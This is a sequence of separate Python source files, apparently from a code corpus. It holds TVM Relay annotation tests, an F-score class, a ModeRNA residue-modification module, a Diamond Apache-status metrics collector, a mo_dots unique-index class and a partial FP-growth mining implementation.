assert transform.AnnotateTarget(target, annotate_non_call_ops)(before())
def test_ref_create_read_write():
target = "relu"
@tvm.ir.register_op_attr("nn.relu", "target." + target)
def annotate(expr):
return True
def before():
ref = relay.expr.RefCreate(relay.const(1.0))
r = relay.expr.RefWrite(ref, relay.nn.relu(relay.expr.RefRead(ref)))
return tvm.IRModule.from_expr(r)
def after(annotate_non_call_ops):
co = relay.const(1.0)
if annotate_non_call_ops:
co = relay.annotation.compiler_begin(co, "default")
ref = relay.expr.RefCreate(co)
ref1 = ref
if annotate_non_call_ops:
ref = relay.annotation.compiler_end(ref, "default")
ref = relay.annotation.compiler_begin(ref, "default")
ref1 = relay.annotation.compiler_end(ref1, "default")
ref1 = relay.annotation.compiler_begin(ref1, "default")
read = relay.expr.RefRead(ref1)
if annotate_non_call_ops:
read = relay.annotation.compiler_end(read, "default")
beg = relay.annotation.compiler_begin(read, target)
relu = relay.nn.relu(beg)
end = relay.annotation.compiler_end(relu, target)
if annotate_non_call_ops:
end = relay.annotation.compiler_begin(end, "default")
r = relay.expr.RefWrite(ref, end)
if annotate_non_call_ops:
r = relay.annotation.compiler_end(r, "default")
return tvm.IRModule.from_expr(r)
for annotate_non_call_ops in [True, False, True]:
result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
expected = transform.InferType()(after(annotate_non_call_ops))
assert tvm.ir.structural_equal(expected, result)
def test_tuple():
target = "test_tuple"
@tvm.ir.register_op_attr("nn.relu", "target." + target)
def relu(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("concatenate", "target." + target)
def concatenate(expr): # pylint: disable=unused-variable
return True
"""Test that TupleNode is included in annotation when surrounded by supported nodes."""
def before():
x = relay.var("x", shape=(10, 5))
y = relay.var("y", shape=(10, 5))
a_1 = relay.nn.relu(x)
a_2 = relay.nn.relu(y)
out = relay.concatenate((a_1, a_2), axis=1)
f = relay.Function([x, y], out)
mod = tvm.IRModule.from_expr(f)
return mod
def after(annotate_non_call_ops):
x = relay.var("x", shape=(10, 5))
y = relay.var("y", shape=(10, 5))
cb_1 = relay.annotation.compiler_begin(x, target)
cb_2 = relay.annotation.compiler_begin(y, target)
a_1 = relay.nn.relu(cb_1)
a_2 = relay.nn.relu(cb_2)
ce_1 = relay.annotation.compiler_end(a_1, target)
ce_2 = relay.annotation.compiler_end(a_2, target)
if annotate_non_call_ops:
cb_3 = relay.annotation.compiler_begin(ce_1, target)
cb_4 = relay.annotation.compiler_begin(ce_2, target)
tup = relay.Tuple([cb_3, cb_4])
ce_3 = relay.annotation.compiler_end(tup, target)
else:
ce_3 = relay.Tuple([ce_1, ce_2])
cb_3 = relay.annotation.compiler_begin(ce_3, target)
out = relay.op._make.concatenate(cb_3, 1)
ce_4 = relay.annotation.compiler_end(out, target)
f = relay.Function([x, y], ce_4)
mod = tvm.IRModule.from_expr(f)
return mod
for annotate_non_call_ops in [False, True]:
result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
expected = transform.InferType()(after(annotate_non_call_ops))
assert tvm.ir.structural_equal(expected, result)
def test_composite_function():
def before():
a = relay.var("a", shape=(10, 10))
b = relay.var("b", shape=(10, 10))
# add_relu function
in_1 = relay.var("in_1", shape=(10, 10))
in_2 = relay.var("in_2", shape=(10, 10))
add_node = relay.add(in_1, in_2)
relu_node = relay.nn.relu(add_node)
add_relu = relay.Function([in_1, in_2], relu_node)
add_relu = add_relu.with_attr("Composite", "test.add_relu")
# merged function
r = relay.Call(add_relu, [a, b])
f = relay.Function([a, b], r)
mod = tvm.IRModule.from_expr(f)
return mod
def after():
a = relay.var("a", shape=(10, 10))
b = relay.var("b", shape=(10, 10))
# add_relu function
in_1 = relay.var("in_1", shape=(10, 10))
in_2 = relay.var("in_2", shape=(10, 10))
add_node = relay.add(in_1, in_2)
relu_node = relay.nn.relu(add_node)
add_relu = relay.Function([in_1, in_2], relu_node)
add_relu = add_relu.with_attr("Composite", "test.add_relu")
# merged function
cb_1 = relay.annotation.compiler_begin(a, "test")
cb_2 = relay.annotation.compiler_begin(b, "test")
r = relay.Call(add_relu, [cb_1, cb_2])
ce_1 = relay.annotation.compiler_end(r, "test")
f = relay.Function([a, b], ce_1)
mod = tvm.IRModule.from_expr(f)
return mod
result = transform.AnnotateTarget("test")(before())
expected = transform.InferType()(after())
assert tvm.ir.structural_equal(expected, result)
def test_double_target():
@tvm.ir.register_op_attr("nn.relu", "target.double.A")
def relu(expr): # pylint: disable=unused-variable
return True
def before():
x = relay.var("x", shape=(10, 5))
a_1 = relay.nn.relu(x)
mod = tvm.IRModule.from_expr(a_1)
return mod
for annotate_non_call_ops in [True, False]:
mod = before()
mod1 = transform.AnnotateTarget("double.A", annotate_non_call_ops)(mod)
mod2 = transform.AnnotateTarget("double.A", annotate_non_call_ops)(mod1)
assert tvm.ir.structural_equal(mod1, mod2)
def test_different_targets():
@tvm.ir.register_op_attr("nn.relu", "target.different.A")
def relu(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("add", "target.different.B")
def relu(expr): # pylint: disable=unused-variable
return True
def before():
x = relay.var("x", shape=(10, 5))
a_1 = relay.nn.relu(x)
b_1 = relay.add(a_1, a_1)
mod = tvm.IRModule.from_expr(b_1)
return mod
for annotate_non_call_ops in [True, False]:
mod = before()
mod1 = transform.AnnotateTarget("different.A", annotate_non_call_ops)(mod)
mod1 = transform.AnnotateTarget("different.B", annotate_non_call_ops)(mod1)
mod2 = transform.AnnotateTarget(["different.A", "different.B"], annotate_non_call_ops)(mod)
assert tvm.ir.structural_equal(mod1, mod2)
def test_multiple_runs():
@tvm.ir.register_op_attr("nn.relu", "target.A")
def relu(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("add", "target.B")
def add(expr): # pylint: disable=unused-variable
return True
def before():
x = relay.var("x", shape=(10, 5))
a_1 = relay.nn.relu(x)
a_2 = relay.abs(a_1)
a_3 = relay.nn.relu(a_1)
out = relay.add(a_2, a_3)
f = relay.Function([x], out)
mod = tvm.IRModule.from_expr(f)
return mod
for annotate_non_call_ops in [True, False]:
mod = transform.AnnotateTarget("A", annotate_non_call_ops)(before())
mod = transform.AnnotateTarget("B", annotate_non_call_ops)(mod)
expected = transform.AnnotateTarget(["A", "B"], annotate_non_call_ops)(before())
assert tvm.ir.structural_equal(expected, mod)
def test_ends_with_tuple():
trgt = "clip"
@tvm.ir.register_op_attr("clip", "target." + trgt)
def relu(expr): # pylint: disable=unused-variable
return True
def get_model(get_item):
"""Return a model"""
a = relay.var("a", shape=(1, 16, 16, 4), dtype="uint8")
z = relay.op.clip(a, 0, 255)
b = relay.op.clip(z, 0, 15)
c = relay.op.clip(z, 16, 31)
t = relay.Tuple((c, b))
tgi = relay.TupleGetItem(t, 1) if get_item else t
foo = relay.Function([a], tgi)
return tvm.IRModule.from_expr(tgi)
def get_expected(annotate_non_call_ops, get_item):
a_ = relay.var("a", shape=(1, 16, 16, 4), dtype="uint8")
a = relay.annotation.compiler_begin(a_, trgt)
z = relay.op.clip(a, 0, 255)
z1 = relay.annotation.compiler_end(z, trgt)
z1 = relay.annotation.compiler_begin(z1, trgt)
b = relay.op.clip(z1, 0, 15)
b = relay.annotation.compiler_end(b, trgt)
b = relay.annotation.compiler_begin(b, trgt) if annotate_non_call_ops else b
z2 = relay.annotation.compiler_end(z, trgt)
z2 = relay.annotation.compiler_begin(z2, trgt)
c = relay.op.clip(z2, 16, 31)
c = relay.annotation.compiler_end(c, trgt)
c = relay.annotation.compiler_begin(c, trgt) if annotate_non_call_ops else c
t = relay.Tuple((c, b))
t = relay.annotation.compiler_end(t, trgt) if annotate_non_call_ops else t
if get_item:
t = relay.annotation.compiler_begin(t, trgt) if annotate_non_call_ops else t
tgi = relay.TupleGetItem(t, 1)
tgi = relay.annotation.compiler_end(tgi, trgt) if annotate_non_call_ops else tgi
else:
tgi = t
foo = relay.Function([a_], tgi)
return tvm.IRModule.from_expr(foo)
for get_item in [True, False]:
for annotate_non_call_ops in [False, True]:
mod = get_model(get_item)
mod = transform.AnnotateTarget("clip", annotate_non_call_ops)(mod)
expected = transform.InferType()(get_expected(annotate_non_call_ops, get_item))
assert tvm.ir.structural_equal(expected, mod)
def test_if_else():
target = "test_if_else"
@tvm.ir.register_op_attr("equal", "target." + target)
def relu(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("tanh", "target." + target)
def tanh(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("sigmoid", "target." + target)
def sigmoid(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("erf", "target." + target)
def erf(expr): # pylint: disable=unused-variable
return True
"""Test that If-else nodes compiles correctly when surrounded by supported nodes."""
def before():
data = relay.var("data", shape=(1, 32))
eq1 = relay.var("e1", shape=[], dtype="float32")
eq2 = relay.var("e2", shape=[], dtype="float32")
eq = relay.equal(eq1, eq2)
true_branch = relay.tanh(data)
false_branch = relay.sigmoid(data)
ife = relay.If(eq, true_branch, false_branch)
out = relay.erf(ife)
func = relay.Function([data, eq1, eq2], out)
mod = tvm.IRModule.from_expr(func)
return mod
def after():
data = relay.var("data", shape=(1, 32))
eq1 = relay.var("e1", shape=[], dtype="float32")
eq2 = relay.var("e2", shape=[], dtype="float32")
cb_1 = relay.annotation.compiler_begin(eq1, target)
cb_2 = relay.annotation.compiler_begin(eq2, target)
equality_condition = relay.equal(cb_1, cb_2)
ce_1 = relay.annotation.compiler_end(equality_condition, target)
# if condition
cb_3 = relay.annotation.compiler_begin(data, target)
true_branch = relay.tanh(cb_3)
ce_2 = relay.annotation.compiler_end(true_branch, target)
# else condition
cb_4 = relay.annotation.compiler_begin(data, target)
false_branch = relay.sigmoid(cb_4)
ce_3 = relay.annotation.compiler_end(false_branch, target)
if_condition = relay.If(ce_1, ce_2, ce_3)
cb_5 = relay.annotation.compiler_begin(if_condition, target)
erf_out = relay.erf(cb_5)
ce_4 = relay.annotation.compiler_end(erf_out, target)
func = relay.Function([data, eq1, eq2], ce_4)
mod = tvm.IRModule.from_expr(func)
return mod
expected = transform.InferType()(after())
for annotate_non_call_ops in [True, False]:
result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
assert tvm.ir.structural_equal(expected, result)
def test_while_let():
target = "test_while_let"
@tvm.ir.register_op_attr("less", "target." + target)
def less(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("add", "target." + target)
def add(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("zeros_like", "target." + target)
def zeros_like(expr): # pylint: disable=unused-variable
return True
"""Test that let nodes compiles correctly when surrounded by other nodes."""
def before():
var1 = relay.var("var1", shape=(2,))
var2 = relay.var("var2", shape=(), dtype="int32")
var3 = relay.var("var3", shape=(2,))
cond = relay.less(var2, relay.const(10, dtype="int32"))
loop = relay.var("while_loop")
ii = var2 + relay.const(1, dtype="int32")
ss = var3 + var1
true_branch = loop(ii, ss)
ife = relay.If(cond, true_branch, var3)
func_1 = relay.Function([var2, var3], ife)
ret = relay.Let(loop, func_1, loop(relay.const(0, dtype="int32"), relay.zeros_like(var1)))
func_2 = relay.Function([var1], ret)
mod = tvm.IRModule.from_expr(func_2)
return mod
def after(annotate_non_call_ops):
var1 = relay.var("var1", shape=(2,))
var2 = relay.var("var2", shape=(), dtype="int32")
var3 = relay.var("var3", shape=(2,))
var4 = relay.const(10, dtype="int32")
cb_1 = relay.annotation.compiler_begin(var2, target)
cb_2 = relay.annotation.compiler_begin(var4, target)
less_condition = relay.less(cb_1, cb_2)
ce_1 = relay.annotation.compiler_end(less_condition, target)
loop = relay.var("while_loop")
# if condition
cb_3 = relay.annotation.compiler_begin(var2, target)
cb_4 = relay.annotation.compiler_begin(relay.const(1, dtype="int32"), target)
add_op_1 = relay.add(cb_3, cb_4)
ce_2 = relay.annotation.compiler_end(add_op_1, target)
cb_5 = relay.annotation.compiler_begin(ce_2, "default") if annotate_non_call_ops else ce_2
cb_6 = relay.annotation.compiler_begin(var3, target)
cb_7 = relay.annotation.compiler_begin(var1, target)
add_op_2 = relay.add(cb_6, cb_7)
ce_3 = relay.annotation.compiler_end(add_op_2, target)
cb_8 = relay.annotation.compiler_begin(ce_3, "default") if annotate_non_call_ops else ce_3
true_branch = loop(cb_5, cb_8) # while loop
ce_4 = (
relay.annotation.compiler_end(true_branch, "default")
if annotate_non_call_ops
else true_branch
)
if_condition = relay.If(ce_1, ce_4, var3)
const_1 = relay.const(0, dtype="int32")
cb_9 = (
relay.annotation.compiler_begin(const_1, "default")
if annotate_non_call_ops
else const_1
)
cb_10 = relay.annotation.compiler_begin(var1, target)
zeros_like = relay.zeros_like(cb_10)
ce_5 = relay.annotation.compiler_end(zeros_like, target)
cb_11 = relay.annotation.compiler_begin(ce_5, "default") if annotate_non_call_ops else ce_5
while_condition = loop(cb_9, cb_11)
ce_6 = (
relay.annotation.compiler_end(while_condition, "default")
if annotate_non_call_ops
else while_condition
)
func_1 = relay.Function([var2, var3], if_condition)
ret = relay.Let(loop, func_1, ce_6)
func_2 = relay.Function([var1], ret)
mod = tvm.IRModule.from_expr(func_2)
return mod
for annotate_non_call_ops in [False, True]:
result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
expected = transform.InferType()(after(annotate_non_call_ops))
assert tvm.ir.structural_equal(expected, result)
def test_if_free_vars():
target = "test_if_free_vars"
@tvm.ir.register_op_attr("equal", "target." + target)
def equal(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("sigmoid", "target." + target)
def sigmoid(expr): # pylint: disable=unused-variable
return True
@tvm.ir.register_op_attr("erf", "target." + target)
def erf(expr): # pylint: disable=unused-variable
return True
"""Test that If-else nodes compiles correctly when surrounded by free variables"""
def before():
data = relay.var("data", shape=(1, 32))
eq1 = relay.var("e1", shape=[], dtype="float32")
eq2 = relay.var("e2", shape=[], dtype="float32")
eq = relay.equal(eq1, eq2)
true_branch = relay.zeros(shape=(1, 32), dtype="float32")
false_branch = relay.sigmoid(data)
ife = relay.If(eq, true_branch, false_branch)
out = relay.erf(ife)
func = relay.Function([data, eq1, eq2], out)
mod = tvm.IRModule.from_expr(func)
return mod
def after():
data = relay.var("data", shape=(1, 32))
eq1 = relay.var("e1", shape=[], dtype="float32")
eq2 = relay.var("e2", shape=[], dtype="float32")
cb_1 = relay.annotation.compiler_begin(eq1, target)
cb_2 = relay.annotation.compiler_begin(eq2, target)
equality_condition = relay.equal(cb_1, cb_2)
ce_1 = relay.annotation.compiler_end(equality_condition, target)
# if condition
true_branch = relay.zeros(shape=(1, 32), dtype="float32")
# else condition
cb_3 = relay.annotation.compiler_begin(data, target)
false_branch = relay.sigmoid(cb_3)
ce_2 = relay.annotation.compiler_end(false_branch, target)
if_condition = relay.If(ce_1, true_branch, ce_2)
cb_4 = relay.annotation.compiler_begin(if_condition, target)
erf_out = relay.erf(cb_4)
ce_3 = relay.annotation.compiler_end(erf_out, target)
func = relay.Function([data, eq1, eq2], ce_3)
mod = tvm.IRModule.from_expr(func)
return mod
for annotate_non_call_ops in [True, False]:
result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
expected = transform.InferType()(after())
assert tvm.ir.structural_equal(expected, result)
def test_free_vars_zeros():
target = "test_free_vars_zeros"
"""Test that free variables compile correctly on their own"""
def before():
func = relay.Function([], relay.zeros(shape=(0), dtype="float32"))
mod = tvm.IRModule.from_expr(func)
return mod
def after():
func = relay.Function([], relay.zeros(shape=(0), dtype="float32"))
mod = tvm.IRModule.from_expr(func)
return mod
result = transform.AnnotateTarget(target)(before())
expected = transform.InferType()(after())
assert tvm.ir.structural_equal(expected, result)
def test_empty_tuple():
target = "test_empty_tuple"
"""An empty tuple should behave just like a call with no args (see above test)."""
def before():
func = relay.Function([], relay.Tuple([]))
mod = tvm.IRModule.from_expr(func)
return mod
def after():
func = relay.Function([], relay.Tuple([]))
mod = tvm.IRModule.from_expr(func)
return mod
for annotate_non_call_ops in [True, False]:
result = transform.AnnotateTarget(target, annotate_non_call_ops)(before())
expected = transform.InferType()(after())
assert tvm.ir.structural_equal(expected, result)
if __name__ == "__main__":
test_extern_dnnl()
test_composite_function()
# test_extern_dnnl_mobilenet()
test_multiple_ends()
test_type_propagation()
test_tuple()
test_multiple_runs()
test_if_else()
test_while_let()
test_if_free_vars()
test_free_vars_zeros()
test_different_targets()
test_double_target()
test_ends_with_tuple()
test_ref_create_read_write()
test_empty_tuple()
|
"""
Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""FScore."""
class FScore(object):
"""FScore."""
def __init__(self, correct=0, predcount=0, goldcount=0):
self.correct = correct # correct brackets
self.predcount = predcount # total predicted brackets
self.goldcount = goldcount # total gold brackets
def precision(self):
if self.predcount > 0:
return (100.0 * self.correct) / self.predcount
else:
return 0.0
def recall(self):
if self.goldcount > 0:
return (100.0 * self.correct) / self.goldcount
else:
return 0.0
def fscore(self):
precision = self.precision()
recall = self.recall()
if (precision + recall) > 0:
return (2 * precision * recall) / (precision + recall)
else:
return 0.0
def __str__(self):
precision = self.precision()
recall = self.recall()
fscore = self.fscore()
return '(P= {:0.2f}, R= {:0.2f}, F= {:0.2f})'.format(
precision,
recall,
fscore,
)
def __repr__(self):
return str(self)
def __iadd__(self, other):
self.correct += other.correct
self.predcount += other.predcount
self.goldcount += other.goldcount
return self
def __add__(self, other):
return FScore(self.correct + other.correct,
self.predcount + other.predcount,
self.goldcount + other.goldcount)
def __lt__(self, other):
if isinstance(other, FScore):
return self.fscore() < other.fscore()
else:
return self.fscore < other
def __gt__(self, other):
if isinstance(other, FScore):
return self.fscore() > other.fscore()
else:
return self.fscore > other
def detailed_str(self):
return ('(Pred= {}, Gold={}, Correct={})'.format(
self.predcount, self.goldcount, self.correct) + '\t' + self.__str__())
|
"""
Add modifications to a residue
"""
from ResidueEditor import ResidueEditor
from BaseExchanger import BaseExchanger
from ModificationRemover import ModificationRemover
from moderna.util.Errors import AddModificationError
from moderna.util.LogFile import log
from moderna.Constants import ANY_RESIDUE, MISSING_RESIDUE, \
UNKNOWN_RESIDUE_SHORT, B_FACTOR_ADD_MODIF, \
ADDING_MODIFICATION_RULES_PATH
def parse_modification_rules(separator=' | '):
"""
Prepares a rule for adding a modification.
Rules describe which fragments add and how to do this
to obtain a residue with given modification.
Returns dict of list of dicts with rules for adding a single fragment.
Keys in each rule dict: ['modification_name', 'original_base', 'remove',
'moved_link_atoms', 'fixed_link_atoms', 'fragment_file_name', 'pdb_abbrev']
"""
rules = {}
try:
infile = open(ADDING_MODIFICATION_RULES_PATH)
except IOError:
log.write_message('File does not exist: %s ' % ADDING_MODIFICATION_RULES_PATH)
return {}
for line in infile:
line = line.strip().split(separator)
if len(line) >= 7:
mod_name = line[0].strip()
rules.setdefault(mod_name, [])
rule = {}
rule['modification_name'] = line[0]
rule['original_base'] = line[1]
rule['remove'] = line[2]
rule['moved_link_atoms'] = line[3].split(',')
rule['fixed_link_atoms'] = line[4].split(',')
rule['fragment_file_name'] = line[5]
rule['pdb_abbrev'] = line[6]
rules[mod_name].append(rule)
return rules
MODIFICATION_RULES = parse_modification_rules()
class ModificationAdder(ResidueEditor):
def add_modification(self, resi, modification_name):
"""
Adds a modification to a residue.
It adds single fragments (add_single_fragment)
according to adding modification rules (get_modification_rules).
Arguments:
- modification name (as a long abbreviation)
"""
try:
if modification_name in [ANY_RESIDUE, MISSING_RESIDUE]:
raise AddModificationError('Residue %s: expected a modification name, instead got missing/any residue abbreviation "%s"'\
% (resi.identifier, modification_name))
else:
if resi.long_abbrev == UNKNOWN_RESIDUE_SHORT:
self.mutate_unknown_residue(resi)
if resi.modified:
rem = ModificationRemover()
rem.remove_modification(resi)
rules = MODIFICATION_RULES.get(modification_name, [])
if not rules:
raise AddModificationError('Residue %s: there is no rule for adding this modification. Check modification name "%s".' \
%(resi.identifier, modification_name))
else:
if rules[0]['original_base'] != resi.original_base:
bex = BaseExchanger()
bex.exchange_base(resi, rules[0]['original_base'])
for rule in rules:
self.add_single_fragment(resi, rule)
resi.change_name(modification_name)
self.set_bfactor(resi, B_FACTOR_ADD_MODIF)
except IOError:
raise AddModificationError('Residue %s: could not add modification.' % resi.identifier)
def add_modification(resi, long_abbrev):
"""Adds modification with given abbreviation"""
old_name = resi.long_abbrev
add = ModificationAdder()
add.add_modification(resi, long_abbrev)
log.write_message('Residue %s: modification added (%s ---> %s).' %(resi.identifier, old_name, long_abbrev))
|
# coding=utf-8
"""
Collect stats from Apache HTTPD server using mod_status
#### Dependencies
* mod_status
* httplib
* urlparse
"""
import re
import httplib
import urlparse
import diamond.collector
class HttpdCollector(diamond.collector.Collector):
def __init__(self, *args, **kwargs):
super(HttpdCollector, self).__init__(*args, **kwargs)
if 'url' in self.config:
self.config['urls'].append(self.config['url'])
self.urls = {}
for url in self.config['urls']:
if ' ' in url:
parts = url.split(' ')
self.urls[parts[0]] = parts[1]
else:
self.urls[''] = url
def get_default_config_help(self):
config_help = super(HttpdCollector, self).get_default_config_help()
config_help.update({
'urls': "Urls to server-status in auto format, comma seperated,"
+ " Format 'nickname http://host:port/server-status?auto, "
+ ", nickname http://host:port/server-status?auto, etc'",
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(HttpdCollector, self).get_default_config()
config.update({
'path': 'httpd',
'urls': ['localhost http://localhost:8080/server-status?auto']
})
return config
def collect(self):
for nickname in self.urls.keys():
url = self.urls[nickname]
metrics = ['ReqPerSec', 'BytesPerSec', 'BytesPerReq',
'BusyWorkers', 'IdleWorkers', 'Total Accesses']
try:
while True:
# Parse Url
parts = urlparse.urlparse(url)
# Parse host and port
endpoint = parts[1].split(':')
if len(endpoint) > 1:
service_host = endpoint[0]
service_port = int(endpoint[1])
else:
service_host = endpoint[0]
service_port = 80
# Setup Connection
connection = httplib.HTTPConnection(service_host,
service_port)
url = "%s?%s" % (parts[2], parts[4])
connection.request("GET", url)
response = connection.getresponse()
data = response.read()
headers = dict(response.getheaders())
if ('location' not in headers
or headers['location'] == url):
connection.close()
break
url = headers['location']
connection.close()
except Exception, e:
self.log.error(
"Error retrieving HTTPD stats for host %s:%s, url '%s': %s",
service_host, str(service_port), url, e)
continue
exp = re.compile('^([A-Za-z ]+):\s+(.+)$')
for line in data.split('\n'):
if line:
m = exp.match(line)
if m:
k = m.group(1)
v = m.group(2)
if k in metrics:
# Get Metric Name
metric_name = "%s" % re.sub('\s+', '', k)
# Prefix with the nickname?
if len(nickname) > 0:
metric_name = nickname + '.' + metric_name
# Get Metric Value
metric_value = "%d" % float(v)
# Publish Metric
self.publish(metric_name, metric_value)
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import, division, unicode_literals
from mo_dots import is_data, is_sequence, tuplewrap, unwrap, wrap
from mo_dots.objects import datawrap
from mo_future import PY2, iteritems, Set, Mapping, Iterable
from mo_logs import Log
from mo_logs.exceptions import suppress_exception
DEBUG = False
class UniqueIndex(Set, Mapping):
"""
DEFINE A SET OF ATTRIBUTES THAT UNIQUELY IDENTIFIES EACH OBJECT IN A list.
THIS ALLOWS set-LIKE COMPARISIONS (UNION, INTERSECTION, DIFFERENCE, ETC) WHILE
STILL MAINTAINING list-LIKE FEATURES
KEYS CAN BE DOT-DELIMITED PATHS TO DEEP INNER OBJECTS
"""
def __init__(self, keys, data=None, fail_on_dup=True):
self._data = {}
self._keys = tuplewrap(keys)
self.count = 0
self.fail_on_dup = fail_on_dup
if data:
for d in data:
self.add(d)
def __getitem__(self, key):
try:
_key = value2key(self._keys, key)
if len(self._keys) == 1 or len(_key) == len(self._keys):
d = self._data.get(_key)
return wrap(d)
else:
output = wrap([
d
for d in self._data.values()
if all(wrap(d)[k] == v for k, v in _key.items())
])
return output
except Exception as e:
Log.error("something went wrong", e)
def __setitem__(self, key, value):
Log.error("Use add() to ad to an index")
# try:
# key = value2key(self._keys, key)
# d = self._data.get(key)
# if d != None:
# Log.error("key already filled")
# self._data[key] = unwrap(value)
# self.count += 1
#
# except Exception as e:
# Log.error("something went wrong", e)
def keys(self):
return self._data.keys()
def pop(self):
output = iteritems(self._data).next()[1]
self.remove(output)
return wrap(output)
def add(self, val):
val = datawrap(val)
key = value2key(self._keys, val)
if key == None:
Log.error("Expecting key to be not None")
try:
d = self._data.get(key)
except Exception as e:
key = value2key(self._keys, val)
if d is None:
self._data[key] = unwrap(val)
self.count += 1
elif d is not val:
if self.fail_on_dup:
Log.error("{{new|json}} with key {{key|json}} already filled with {{old|json}}", key=key, new=val, old=self[val])
elif DEBUG:
Log.warning("key {{key|json}} already filled\nExisting\n{{existing|json|indent}}\nValue\n{{value|json|indent}}",
key=key,
existing=d,
value=val
)
def extend(self, values):
for v in values:
self.add(v)
def remove(self, val):
key = value2key(self._keys, datawrap(val))
if key == None:
Log.error("Expecting key to not be None")
d = self._data.get(key)
if d is None:
# ALREADY GONE
return
else:
del self._data[key]
self.count -= 1
def __contains__(self, key):
return self[key] != None
if PY2:
def __iter__(self):
return (wrap(v) for v in self._data.itervalues())
else:
def __iter__(self):
return (wrap(v) for v in self._data.values())
def __sub__(self, other):
output = UniqueIndex(self._keys, fail_on_dup=self.fail_on_dup)
for v in self:
if v not in other:
output.add(v)
return output
def __and__(self, other):
output = UniqueIndex(self._keys)
for v in self:
if v in other:
output.add(v)
return output
def __or__(self, other):
output = UniqueIndex(self._keys)
for v in self:
output.add(v)
for v in other:
with suppress_exception:
output.add(v)
return output
def __ior__(self, other):
for v in other:
with suppress_exception:
self.add(v)
return self
def __xor__(self, other):
if not isinstance(other, Iterable):
Log.error("Expecting other to be iterable")
other = UniqueIndex(keys=self._keys, data=other, fail_on_dup=False)
return (self-other) | (other-self)
def __len__(self):
if self.count == 0:
for d in self:
self.count += 1
return self.count
def subtract(self, other):
return self.__sub__(other)
def intersect(self, other):
return self.__and__(other)
def value2key(keys, val):
if len(keys) == 1:
if is_data(val):
return val[keys[0]]
elif is_sequence(val):
return val[0]
else:
return val
else:
if is_data(val):
return datawrap({k: val[k] for k in keys})
elif is_sequence(val):
return datawrap(dict(zip(keys, val)))
else:
Log.error("do not know what to do here")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Created on Sep 20, 2015
@author: freestyle4568
'''
"""
this progarm is to test fp-growth algorithm
user guide: result_list, support_data_dict = fptree(dataset, min_support)
该函数返回列表格式的result_list, 元素为列表, [[1元素项集], [2元素项集]]
子列表元素为固定集合 -- frozenset({, , ,})
support_data_dict为字典格式,元素为(frozenset({}): number)
"""
from operator import itemgetter
class TreeNode:
def __init__(self, name_value, num_occur, parent_node):
self.name = name_value
self.count = num_occur
self.nodelink = None
self.parent = parent_node
self.children = {}
def inc(self, num_occur):
self.count += num_occur
def disp(self, index=1):
print(' '*index, self.name, ' ', self.count)
for child in self.children.values():
child.disp(index+1)
return
def create_tree(dataset, min_support=1):
header_table = {}
for trans in dataset:
for item in trans:
header_table[item] = header_table.get(item, 0) + dataset[trans]
tmp_keys = list(header_table.keys())
for k in tmp_keys:
if header_table[k] < min_support:
header_table.pop(k)
#print("frist header_table is: ", header_table)
freqitem_set = set(header_table.keys())
if len(freqitem_set) == 0:
#raise RuntimeError('no freqitems satisfy this min_support')
return None, None
for k in header_table:
header_table[k] = [header_table[k], None]
result_tree = TreeNode('NullNode', 1, None)
for transaction, count in dataset.items():
local_data = {}
for item in transaction:
if item in freqitem_set:
local_data[item] = header_table[item][0]
if len(local_data) > 0:
ordered_items = [v[0] for v in sorted(local_data.items(),
key = itemgetter(1, 0), reverse = True)]
update_tree(ordered_items, result_tree, header_table, count)
return result_tree, header_table
def update_tree(items, tree, header_table, count):
if items[0] in tree.children:
tree.children[items[0]].inc(count)
else:
tree.children[items[0]] = TreeNode(items[0], count, tree)
if header_table[items[0]][1] == None:
header_table[items[0]][1] = tree.children[items[0]]
else:
update_header(header_table[items[0]][1],
tree.children[items[0]])
if len(items) > 1:
update_tree(items[1:], tree.children[items[0]], header_table, count)
return
def update_header(node_to_test, target_node):
while (node_to_test.nodelink != None):
node_to_test = node_to_test.nodelink
node_to_test.nodelink = target_node
return
def load_simple_data():
simple_data = [['r', 'z', 'h', 'j', 'p'],
['z', 'y', 'x', 'w', 'v', 'u', 't', 's'],
['z'],
['r', 'x', 'n', 'o', 's'],
['y', 'r', 'x', 'z', 'q', 't', 'p'],
['y', 'z', 'x', 'e', 'q', 's', 't', 'm']
]
return simple_data
def create_init_set(dataset):
result_dict = {}
for d in dataset:
result_dict[frozenset(d)] = 1
return result_dict
def ascend_tree(leaf_node, prefix_path):
if leaf_node.parent != None:
prefix_path.append(leaf_node.name)
ascend_tree(leaf_node.parent, prefix_path)
return
def find_prefix_path(tree_node):
condition_path = {}
while tree_node != None:
prefix_path = []
ascend_tree(tree_node, prefix_path)
if len(prefix_path) > 1:
condition_path[frozenset(prefix_path[1:])] = tree_node.count
tree_node = tree_node.nodelink
return condition_path
def mine_tree(tree, header_table, min_support, prefix, freqitem_list, support_list):
big_list = [v[0] for v in sorted(header_table.items(), key = lambda p: p[1][0])]
for base in big_list:
new_freq_set = prefix.copy()
new_freq_set.add(base)
freqitem_list.append(new_freq_set)
#print(new_freq_set)
support_list.append(header_table[base][0])
condition_path = find_prefix_path(header_table[base][1])
